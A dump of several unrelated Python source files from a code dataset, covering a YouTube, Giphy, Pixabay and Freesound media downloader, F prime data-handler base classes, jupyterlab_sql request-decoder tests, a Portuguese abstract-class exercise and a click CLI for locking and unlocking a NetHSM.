start = datetime.strptime(time_string, '%H:%M:%S')
end = start + timedelta(0, interval)
if end > duration:
end = start - timedelta(0, interval)
return title, end.strftime('%H:%M:%S'), start.strftime('%H:%M:%S')
else:
return title, start.strftime('%H:%M:%S'), end.strftime('%H:%M:%S')
def download_handler(total_bytes_in_stream, total_bytes_downloaded, ratio_downloaded, download_rate, eta):
percent_downloaded = round(int(ratio_downloaded * 100))
if config.GLOBAL_DOWNLOAD_TRACKER != percent_downloaded:
config.GLOBAL_DOWNLOAD_TRACKER = percent_downloaded
task = {'download': percent_downloaded}
utils.update_script(task)
def download_video(video_id):
logger.info('Inside download_video...')
pafy.new(video_id).getbest(preftype='mp4')\
.download(config.VID_PATH, quiet=True, meta=True, callback=download_handler)
class VidDownloader(object):
def __init__(self, id, download_num):
self.download_num = download_num
self.interval_lst = []
self.id = id
self.tags = []
def download(self):
logger.info('Downloading videos...')
id_lst = self.get_vid_ids(self.download_num)
used = []
i = 0
while i < self.download_num:
index = random.randint(0, len(id_lst) - 1)
if index not in used:
used.append(index)
video_id = id_lst[index]['id']
video = pafy.new(video_id)
duration = datetime.strptime(video.duration, '%H:%M:%S')
if 20 > duration.minute > 0:
interval = generate_interval(video, duration)
logger.info('Interval: ' + str(interval))
self.interval_lst.append(interval)
cmd = ['runp', 'Downloaders.py', 'download_video:' + str(video_id)]
p = subprocess.Popen(cmd)
pid = utils.wait_timeout(p, config.DOWNLOAD_TIMEOUT)
if pid is not None:
logger.info('download_video ran successfully!')
store(self.id, 'https://www.youtube.com/watch?v=' + str(video.videoid), 'vid')
i += 1
else:
logger.info('download_video timed out!')
def get_vid_ids(self, download_num):
logger.info('Getting video ids...')
youtube = build(config.YOUTUBE_API_SERVICE_NAME, config.YOUTUBE_API_VERSION,
developerKey=config.YOUTUBE_API_KEY, cache_discovery=False)
id_lst = []
while len(id_lst) != (download_num * 5):
search = utils.generate_keyword()
search_response = youtube.search().list(q=search, part='id, snippet', type='video').execute()
for result in search_response.get('items', []):
video_id = {'id': result['id']['videoId']}
id_lst.append(video_id)
self.tags.append(search)
return id_lst
class GifDownloader(object):
def __init__(self, id, download_num):
self.download_num = download_num
self.id = id
self.tags = []
def download(self):
logger.info('Downloading gifs...')
api = giphy_client.DefaultApi()
limit = 50
offset = 0
rating = ['g', 'pg', 'pg-13']
lang = 'en'
fmt = 'json'
i = 0
while i < self.download_num:
search = utils.generate_keyword()
try:
response = api.stickers_search_get(config.GIPHY_API_KEY, search, limit=limit, offset=offset,
rating=rating[random.randint(0, 2)], lang=lang, fmt=fmt)
response_count = len(response.data)
if response_count:
index = random.randint(0, response_count - 1)
url = response.data[index].images.original.url
gif_path = config.GIF_PATH + str(i) + '.gif'
args = ','.join("{0}".format(arg) for arg in [url, gif_path])
cmd = ['runp', 'Downloaders.py', 'downloader:' + args]
p = subprocess.Popen(cmd)
pid = utils.wait_timeout(p, config.DOWNLOAD_TIMEOUT)
if pid is not None:
logger.info('Gif downloader ran successfully!')
store(self.id, url, 'gif')
self.tags.append(search)
i += 1
else:
logger.info('Gif downloader timed out!')
except ApiException as e:
logger.error("Exception when calling DefaultApi->stickers_random_get: %s\n" % e)
class PicDownloader(object):
def __init__(self, id, download_num):
self.download_num = download_num
self.id = id
self.tags = []
def download(self):
logger.info('Downloading pics...')
pix = Image(config.PIXABAY_API_KEY)
i = 0
while i < self.download_num:
search = utils.generate_keyword()
img_search = pix.search(q=search, page=1, per_page=30)
hits = len(img_search['hits'])
if hits:
index = random.randint(0, hits - 1)
url = img_search['hits'][index]['webformatURL']
pic_path = config.PIC_PATH + str(i) + '.jpg'
args = ','.join("{0}".format(arg) for arg in [url, pic_path])
cmd = ['runp', 'Downloaders.py', 'downloader:' + args]
p = subprocess.Popen(cmd)
pid = utils.wait_timeout(p, config.DOWNLOAD_TIMEOUT)
if pid is not None:
logger.info('Picture downloader ran successfully!')
store(self.id, url, 'pic')
self.tags.append(search)
i += 1
else:
utils.clear_file(pic_path)
logger.info('Picture downloader timeout out!')
class SfxDownloader(object):
def __init__(self, id, download_num):
self.id = id
self.tags = []
self.download_num = download_num
def download(self):
logger.info('Downloading sfx...')
client = freesound.FreesoundClient()
client.set_token(config.FREESOUND_API_KEY)
i = 0
while i < int(self.download_num):
try:
sound_id = random.randint(0, 96451)
response = client.get_sound(sound_id)
url = response.url
args = ','.join("{0}".format(arg) for arg in [str(sound_id), str(i)])
cmd = ['runp', 'Downloaders.py', 'download_sfx:' + args]
p = subprocess.Popen(cmd)
pid = utils.wait_timeout(p, config.DOWNLOAD_TIMEOUT)
if pid is not None:
logger.info('download_sfx successfully ran...')
store(self.id, url, 'sfx')
i += 1
else:
logger.error('download_sfx function has timed out...')
except Exception as e:
logger.error('Exception occured while downloading sfx...')
logger.error(e)
# TODO search by randomly generated word
def download_sfx(sound_id, counter):
logger.info('Inside download_sfx...')
client = freesound.FreesoundClient()
client.set_token(config.FREESOUND_API_KEY)
response = client.get_sound(sound_id)
name = str(counter) + '.mp3'
response.retrieve_preview(config.SFX_PATH, name=name)
|
StarcoderdataPython
|
1689165
|
"""
handlers.py:
Defines a set of base classes that allow for the system to handle various functions of the system. Primarily this
defines the "DataHandler" base class for handling data.
@author mstarch
"""
import abc
class DataHandler(abc.ABC):
"""
Defines the necessary functions required to handle data as part of the F prime project. This allows any implementor
to be used to handle data.
"""
@abc.abstractmethod
def data_callback(self, data, sender=None):
"""
Callback function used to handle data being produced elsewhere in the system and processed by the given object.
Data supplied should be of a known type for the given object, and sender is an id of the sender. If not supplied
sender will be None.
:param data: data to be handled by this class
:param sender: (optional) id of sender, otherwise None
"""
class HandlerRegistrar(abc.ABC):
"""
Defines a class that will take in registrants and remember them for calling back later. These objects should be of
the type "DataHandler" as this handler will send data back to these handlers when asked to do so.
"""
def __init__(self):
"""
Constructor defining the internal lists needed to store the registrants.
"""
super().__init__()
self._registrants = []
def register(self, registrant):
"""
Register a registrant with this registrar. Will be stored and called back when asked to send data to all the
handlers registered.
:param registrant: handler to register
"""
if not isinstance(registrant, DataHandler):
raise ValueError("Cannot register non data handler")
self._registrants.append(registrant)
def deregister(self, registrant):
"""
Remove a registrant from the registrar such that it will not be called back later. Note: ignores invalid
removals by trapping the error, as the desired effect is already satisfied.
:param registrant: registrant to remove
:return: True if found, False if not. May safely be ignored.
"""
try:
self._registrants.remove(registrant)
return True
except ValueError:
return False
def send_to_all(self, data, sender=None):
"""
Sends the given data to all registrants.
:param data: data to send back to registrants
:param sender: (optional) sender to pass to data_callback
"""
for registrant in self._registrants:
registrant.data_callback(data, sender)
|
StarcoderdataPython
|
3389933
|
import json
from jsonschema import Draft4Validator as Validator
import pytest
from jupyterlab_sql.request_decoder import decode, RequestDecodeError
test_schema = {
"type": "object",
"properties": {"prop": {"type": "string"}},
"required": ["prop"],
}
test_body = {"prop": "value"}
def test_decode_not_json():
body = "not-json"
with pytest.raises(RequestDecodeError):
decode(body, None)
def test_decode_incorrect_json():
body = json.dumps({"invalid": "json"})
validator = Validator(test_schema)
with pytest.raises(RequestDecodeError):
decode(body, validator)
def test_decode():
body_str = json.dumps(test_body)
validator = Validator(test_schema)
data = decode(body_str, validator)
assert data == test_body
|
StarcoderdataPython
|
1705787
|
#Here we'll use the abc module (Abstract Base Classes)
import abc
class Pessoa(abc.ABC):
@abc.abstractmethod
def get_bonificacao(self):
pass
class Conta(abc.ABC):
def __init__(self, numero, titular, saldo=0, limite=1000.0):
self._numero = numero
self._titular = titular
self._saldo = saldo
self._limite = limite
@abc.abstractmethod
def atualiza(self):
pass
@abc.abstractmethod
def imprimir_titular(self):
print(self._numero)
print(self._titular)
print(self._saldo)
print(self._limite)
pass
class PJ(Conta):
def __init__(self, numero, titular, saldo=0, limite=1000.0):
super().__init__(numero, titular, saldo=0, limite=1000.0)
C = PJ("1435", "<NAME>")
|
StarcoderdataPython
|
3393723
|
# -*- coding: utf-8 -*-
#
# Copyright 2021 Nitrokey Developers
#
# Licensed under the Apache License, Version 2.0, <LICENSE-APACHE or
# http://apache.org/licenses/LICENSE-2.0> or the MIT license <LICENSE-MIT or
# http://opensource.org/licenses/MIT>, at your option. This file may not be
# copied, modified, or distributed except according to those terms.
import contextlib
import click
import pynitrokey.nethsm
@click.group()
@click.option(
"-h", "--host", "host", required=True, help="Set the host of the NetHSM API"
)
@click.option(
"-v",
"--api-version",
"version",
default="v1",
help="Set the version of the NetHSM API",
)
@click.option("-u", "--username", "username", help="The NetHSM user name")
@click.option("-p", "--password", "password", help="The NetHSM password")
@click.pass_context
def nethsm(ctx, host, version, username, password):
"""Interact with NetHSM, see subcommands."""
ctx.ensure_object(dict)
ctx.obj["NETHSM_HOST"] = host
ctx.obj["NETHSM_VERSION"] = version
ctx.obj["NETHSM_USERNAME"] = username
ctx.obj["NETHSM_PASSWORD"] = password
@contextlib.contextmanager
def connect(ctx, require_auth=True):
host = ctx.obj["NETHSM_HOST"]
version = ctx.obj["NETHSM_VERSION"]
username = None
password = None
if require_auth:
username = ctx.obj["NETHSM_USERNAME"]
password = ctx.obj["NETHSM_PASSWORD"]
if not username:
username = click.prompt(f"[auth] User name for NetHSM {host}")
if not password:
password = click.prompt(
f"[auth] Password for user {username} on NetHSM {host}", hide_input=True
)
with pynitrokey.nethsm.connect(host, version, username, password) as nethsm:
try:
yield nethsm
except pynitrokey.nethsm.NetHSMError as e:
raise click.ClickException(e)
@nethsm.command()
@click.argument("passphrase", required=False)
@click.pass_context
def unlock(ctx, passphrase):
"""Bring a locked NetHSM into operational state."""
with connect(ctx, require_auth=False) as nethsm:
if not passphrase:
passphrase = click.prompt(
f"Unlock passphrase for NetHSM {nethsm.host}", hide_input=True
)
nethsm.unlock(passphrase)
print(f"NetHSM {nethsm.host} unlocked")
@nethsm.command()
@click.pass_context
def lock(ctx):
"""Bring an operational NetHSM into locked state.
This command requires authentication as a user with the Administrator
role."""
with connect(ctx) as nethsm:
nethsm.lock()
print(f"NetHSM {nethsm.host} locked")
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.